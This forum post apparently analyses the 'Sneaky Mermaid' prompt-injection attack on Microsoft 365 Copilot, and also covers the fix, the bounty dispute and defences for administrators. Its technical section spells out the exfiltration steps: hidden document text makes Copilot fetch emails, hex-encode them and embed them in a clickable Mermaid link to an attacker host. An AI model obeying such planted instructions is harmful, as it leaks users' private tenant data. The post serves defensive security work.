Mermaid Exfiltration in Microsoft 365 Copilot: A Wake-Up for AI Security

  • Thread Author
Microsoft 365 Copilot was briefly weaponized by a clever indirect prompt‑injection chain that turned Mermaid diagrams — the lightweight text-to-diagram tool now supported across Microsoft’s Copilot-enabled experiences — into a covert data‑exfiltration channel, allowing an attacker to have tenant content (for example, recent emails) encoded and delivered to an external server when an unsuspecting user clicked a rendered diagram.

Cyberattack flow diagram showing a request to attacker-server.com with a crafted query payload.Background / Overview​

Microsoft 365 Copilot is a retrieval‑augmented AI assistant that synthesizes information from a user’s Microsoft Graph‑connected resources (email, OneDrive, SharePoint, Teams, etc.) to answer natural‑language queries and produce artifacts such as summaries, suggested replies, and diagrams. That convenience is also what makes Copilot a sensitive security boundary: it operates “as the user” and can pull content the user is allowed to access. Recent research showed how adversaries can abuse that design with indirect prompt injection — embedding instructions inside content Copilot will ingest — to alter Copilot’s behavior and leak data.
The specific chain reported publicly in October 2025 — dubbed by journalists as the “Sneaky Mermaid” attack — was disclosed by security researcher Adam Logue and described in multiple outlets. It exploited Copilot’s built‑in Mermaid rendering capability to convert a hex‑encoded payload into a clickable element (a fake “login” button styled with CSS) whose hyperlink contained exfiltrated data. When the victim clicked the element, the payload delivered the encoded tenant data to an attacker‑controlled host (a Burp Collaborator server in the researcher’s proof‑of‑concept). Microsoft told the reporter the bug was patched.

Why this matters: AI assistants widen the attack surface​

Copilot’s job is to read and synthesize enterprise content. That helpful behavior places AI assistants at the intersection of three risky primitives:
  • Access to privileged data (the assistant runs under the calling user’s privileges).
  • Automatic ingestion of document content (including hidden metadata, comments, or markup).
  • Output formats that can be interactive or render web content (images, diagrams, hyperlinks).
When these primitives are combined without strict provenance and sanitization controls, small injections — hidden text in a document, a specially crafted diagram, or embedded Markdown — can cause the assistant to do things it should not, such as call internal search tools or generate external links containing sensitive data. The EchoLeak family of issues earlier in 2025 already demonstrated that zero‑click prompt injection is a practical attack class against RAG‑style assistants. The Mermaid case is the next evolution: click‑required exfiltration that leverages rendering interactivity to move data out of a tenant.

Technical anatomy: how the Mermaid exfiltration chain worked​

The attack is a multi‑stage, engineerable chain that relies on Copilot’s retrieval and rendering behavior. The high‑level steps in the proof‑of‑concept are:
  • Attacker crafts a benign‑looking Office document (for example, a spreadsheet or presentation) with multiple sheets/slides. The visible content looks normal to human reviewers.
  • Hidden inside the file (white text or invisible comments) are nested instructions that indirectly override the user’s summarization request — the hidden payload tells Copilot to call a built‑in tool (search_enterprise_emails) and fetch recent enterprise emails.
  • Copilot fetches the permitted emails (because it honors the calling user’s permissions) and composes a bulleted plaintext output containing the selected messages. The payload then instructs Copilot to hex‑encode that output and split the hex stream into short lines to satisfy Mermaid’s rendering constraints.
  • Copilot is instructed to render the hex chunks inside a Mermaid diagram styled as a login button (Mermaid supports CSS and links in nodes). The node’s hyperlink parameter is set to an attacker‑controlled domain with the hex data appended as a query string.
  • The user, seeing an attractive “To view the confidential content, click here” artifact, clicks the fake login button. The browser follows the hyperlink and sends the URL (which includes the encoded data) to the attacker’s server, where the data can be decoded and reconstructed.
Key technical points that made the chain practical:
  • Mermaid diagrams allow links and CSS within rendered nodes, which can be abused to embed query strings.
  • Copilot’s tools (like search_enterprise_emails) give the assistant programmatic access to tenant content — a necessary primitive for the exfiltration payload.
  • Splitting and hex‑encoding data into short lines is a pragmatic workaround for rendering limits and browser URL length constraints.
Where the chain diverges from purely “server‑side” exploits is that it requires at least one user click to transport the data to an adversary‑controlled endpoint; it is therefore not a zero‑click exploit in this instance. Nonetheless, requiring a single click does not materially reduce the risk in a real phishing campaign because the UI can be manipulated to appear authoritative.

Reproduction, disclosure, and Microsoft’s response​

According to reporting and the researcher’s account, Adam Logue responsibly disclosed the technique to Microsoft. Microsoft validated the chain and applied mitigations that prevent Mermaid renderings produced by Copilot from including interactive outbound links — effectively removing the clickable exfiltration primitive from Copilot‑rendered diagrams. The researcher confirmed that the attack failed after the fix. Several security outlets corroborated Microsoft’s patching action.
This Mermaid incident arrived after the industry had already dealt with EchoLeak (CVE‑2025‑32711) — a June 2025 RAG prompt‑injection vulnerability that Microsoft patched and which demonstrated that LLM scope violations are a practical risk. Those prior events had already prompted Microsoft and others to harden input sanitization, output redaction, and content‑fetching rules for assistant flows. The Mermaid fix is consistent with that larger mitigation trajectory.
Caveat: Microsoft’s public advisory language for many AI‑assistant mitigations is intentionally concise and high‑level. Independent researchers and press reports filled in the technical narrative; some of the step‑by‑step details in media coverage and in the researcher’s write‑up are derived from proof‑of‑concept demos rather than from an exhaustive, vendor‑released technical disclosure. Where an item is only present in a researcher blog or press article and not in a vendor advisory, treat that detail as part of a credible proof‑of‑concept rather than an official engineering specification.

The bug‑bounty controversy: why no payout?​

After fixing the flaw, Microsoft reportedly told the researcher that M365 Copilot was out of scope for the company’s standard vulnerability reward program — meaning the researcher was not eligible for a bounty payment for this submission. That decision upset some in the security community because Copilot operates on a massive volume of enterprise data and past Microsoft bounty programs had expanded to include Copilot‑related components. Microsoft’s bounty program has in recent years broadened to cover many cloud and AI products, but program scope and eligibility remain product‑and‑issue specific. Public reporting indicates Microsoft confirmed the patch but declined a bounty for this submission.
This raises two practical observations for security researchers and program owners:
  • Program scope must keep pace with changing product boundaries. AI assistants are hybrid: they combine web‑facing surfaces, cloud services, and tenant‑scoped features. Clarifying scope for AI and enterprise assistant features is essential to incentivize the research community to surface serious risks.
  • Responsible disclosure is still the right operational model. Even if a direct bounty is not awarded, timely reporting and vendor fixes protect customers; however, a transparent explanation of scope decisions helps preserve researcher trust.
Note: the claim that Microsoft specifically deemed this M365 Copilot component out of scope is supported by reporting and the researcher’s account in the press. Microsoft publishes bounty scope and program changes publicly; if you require final confirmation of the scope decision for legal or procurement reasons, consult Microsoft’s bounty program pages or request written confirmation from MSRC.

Practical risk assessment for administrators​

How dangerous is this vector in the wild? Consider these factors:
  • Likelihood: Moderate. The attack requires delivering a crafted document (phishing or malicious share) and enticing a user to ask Copilot to summarize the document or click the rendered element. Given routine business workflows and the trust users place in Copilot’s outputs, adversaries can reach a foothold via social‑engineering campaigns.
  • Impact: High for exposed users. If successful, the chain can leak email content, attachments, and other tenant data accessible to the calling user — information that can include PII, contracts, financial details, or credentials. The value of such data makes the technique attractive for targeted espionage or extortion.
  • Detectability: Low to moderate. Because the exfiltration uses legitimate HTTP GET requests to attacker domains and Copilot renders the artifacts within trusted UI elements, standard egress monitoring and AV signatures may miss the leakage unless URL patterns or destination hosts are flagged. Centralized logging and link‑click telemetry are therefore essential.
Historical context: similar Mermaid‑based channels have been used in other products (for example, earlier research showed diagram/image‑based exfiltration in development environments), and vendors have responded by removing or sanitizing remote references in assistant outputs. The Copilot Mermaid mitigation — removing interactive external links — follows that same defensive pattern.

Defense: prioritized mitigations for organizations​

Administrators must treat Copilot as a new attack surface and apply layered controls. Recommended immediate and medium‑term actions:
  • Immediate (0–7 days)
  • Disable Mermaid rendering in Copilot‑enabled experiences if your tenant workflows handle regulated or high‑value data and you cannot immediately validate mitigations.
  • Enforce safe default Copilot settings: restrict Copilot’s ability to call connectors or tools (search_enterprise_emails, automated connectors) for broad user groups; require admin enablement for high‑risk roles.
  • Monitor outbound HTTP(S) requests originating from the Copilot rendering surface or related application endpoints; alert on unusual destinations.
  • Short term (1–4 weeks)
  • Audit Copilot access: enumerate which users and service principals have Copilot enabled and what Graph scopes Copilot can access. Revoke or narrow scopes for non‑essential accounts.
  • Hunt for suspicious artifact patterns: hex‑encoded strings in rendered Markdown or Mermaid outputs, or unusually long URLs in logs, may indicate exfiltration attempts.
  • Train staff to treat Copilot‑generated login prompts or “click to view” artifacts with suspicion and to validate re‑authentication flows directly via official portals rather than in‑chat artifacts.
  • Medium term (1–3 months)
  • Implement AI provenance controls: record which documents or external sources were included in Copilot’s context for each output, and show explicit provenance tags in the UI to discourage blind trust in rendered artifacts.
  • Require phishing‑resistant MFA for admin and privileged accounts (FIDO2/WebAuthn) and consider conditional access policies that block risky connections.
  • Coordinate with your vendor (Microsoft) to map fixed KBs and confirm mitigations; validate that the vendor’s server‑side hardening has been applied to your tenant.
Technical teams should also run adversarial tests — craft benign proofs using safe test tenants to verify that Copilot no longer renders interactive outbound links or otherwise surfaces untrusted content as actionable UI.

Broader takeaways for product teams and policy makers​

  • AI provenance is not a UX nicety — it’s a security control. Product teams must separate trusted UI chrome (actions and links that perform changes) from assistant output, and should make any action that could change state or send data require an out‑of‑band confirmation.
  • Guardrails must be context‑aware. Traditional input sanitization is not sufficient; AI assistants need prompt partitioning, strict RAG filters, and explicit access policies preventing the assistant from treating external content as authoritative instructions.
  • Bounty and disclosure programs should evolve with product boundaries. When features bridge user‑scoped content and public surfaces (as Copilot does), program coverage should be clear so researchers are incentivized to report high‑impact issues rather than drop findings into public channels. Transparent scope reduces friction and accelerates fixes.

What we verified and what remains ambiguous​

Verified:
  • The Mermaid exfiltration technique was publicly demonstrated by a researcher and reported by multiple outlets; Microsoft implemented a remediation that removed interactive outbound links from Copilot‑rendered Mermaid diagrams in response.
  • The broader class of indirect prompt injection (EchoLeak / CVE‑2025‑32711) was a real, high‑severity issue patched earlier in 2025, confirming the viability of prompt‑driven exfiltration against RAG assistants.
Unverified / caution flagged:
  • Specific internal timelines (exact MSRC confirmation timestamps and internal patch roll‑out windows) are reconstructed from researcher blogs and press reporting; Microsoft’s public advisories tend to be terse and do not always publish the full exploitation timeline. Treat press‑reported dates as credible reconstructions rather than authoritative vendor timelines unless MSRC lists the same timestamps.
  • The claim that Microsoft categorically refused any bounty for all Copilot‑related reports is nuance‑sensitive: Microsoft has publicly expanded Copilot bounty coverage in 2025, but program scope is modular; for a definitive ruling on this specific submission’s eligibility, researchers must rely on MSRC's written correspondence or program pages.

Final analysis — what administrators should do now​

This episode is a practical reminder that building secure AI experiences requires more than good model architectures — it demands rigorous input/output partitioning, artifact sanitization, and human‑facing provenance controls. For Windows and Microsoft 365 administrators, the immediate playbook is clear:
  • Treat Copilot and other in‑app AI assistants as privileged infrastructure. Restrict broadly and open selectively.
  • Apply vendor fixes promptly and confirm mitigations in your tenant. Don’t assume server‑side fixes fully eliminate client‑side artifacts without verification.
  • Instrument and monitor: collect Copilot session logs, outbound URL requests, and user clicks on assistant‑rendered widgets. Hunt for anomalies.
  • Evolve user training: teach staff not to trust in‑chat login prompts or “click to view” UI items without verifying via official portals.
  • Press vendors for clearer bounty scope and disclosure transparency so researchers aren’t left unsure whether their work will be rewarded and customers aren’t left waiting for remediation.
The Mermaid exfiltration chain was structurally clever but technically straightforward: it combined legitimate features (document ingestion, search tools, Mermaid rendering) into a pipeline that trusted the wrong signals. The quick fix removed the most obvious abuse primitive; the longer fight is to build systems that refuse to confuse content with commands and make provenance and privilege explicit by design.

This incident should be a wake‑up call for every enterprise that has enabled AI assistants without a clear governance model: productivity gains are real, but so are AI‑native attack vectors — and they require both platform fixes and operational controls to manage them safely.

Source: theregister.com Sneaky Mermaid attack in Microsoft 365 Copilot steals data
 

Back
Top